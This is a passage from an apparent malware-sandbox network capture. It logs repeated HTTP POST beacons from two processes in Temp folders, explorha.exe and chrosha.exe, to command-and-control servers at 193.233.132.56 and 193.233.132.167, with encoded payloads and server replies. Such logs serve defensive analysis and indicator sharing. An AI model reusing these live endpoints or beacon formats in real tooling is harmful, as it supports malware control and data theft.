                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:30:11.747539043 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:11 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
78 | 192.168.2.5 | 49900 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:30:11.401204109 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:30:11.647221088 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:11 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
79 | 192.168.2.5 | 49903 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:30:12.026812077 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:30:12.275314093 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:12 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
80 | 192.168.2.5 | 49904 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:30:12.094748974 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:30:12.336752892 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:12 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0
Apr 19, 2024 03:30:12.337548971 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:30:12.584876060 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:12 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
81 | 192.168.2.5 | 49905 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:30:12.524935007 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:30:12.776716948 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:12 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
82 | 192.168.2.5 | 49906 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:30:12.947726011 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:30:13.199318886 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:13 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0
Apr 19, 2024 03:30:13.202181101 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:30:13.458098888 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:13 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
83 | 192.168.2.5 | 49907 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:30:13.151559114 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:30:13.399878025 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:13 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
84 | 192.168.2.5 | 49909 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:30:13.772336960 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:30:14.017925024 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:13 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
85 | 192.168.2.5 | 49910 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:30:13.819487095 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:30:14.066620111 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:13 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0
Apr 19, 2024 03:30:14.067485094 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:30:14.320136070 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:14 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
86 | 192.168.2.5 | 49911 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:30:14.263441086 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:30:14.510910034 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:14 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
87 | 192.168.2.5 | 49912 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:30:14.674686909 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:30:14.919282913 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:14 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0
Apr 19, 2024 03:30:14.924643993 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:30:15.174932957 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:15 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
88 | 192.168.2.5 | 49913 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:30:14.893996000 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:30:15.140826941 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:15 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0
Apr 19, 2024 03:30:15.148159027 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:30:15.398729086 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:15 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
89 | 192.168.2.5 | 49914 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:30:15.534241915 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:30:15.776917934 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:15 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0
Apr 19, 2024 03:30:15.780670881 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:30:16.027312040 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:15 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
90 | 192.168.2.5 | 49915 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:30:15.761995077 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:30:16.013458014 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:15 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
91 | 192.168.2.5 | 49916 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:30:16.258913040 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:30:16.504342079 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:16 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
92 | 192.168.2.5 | 49917 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:30:16.385515928 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
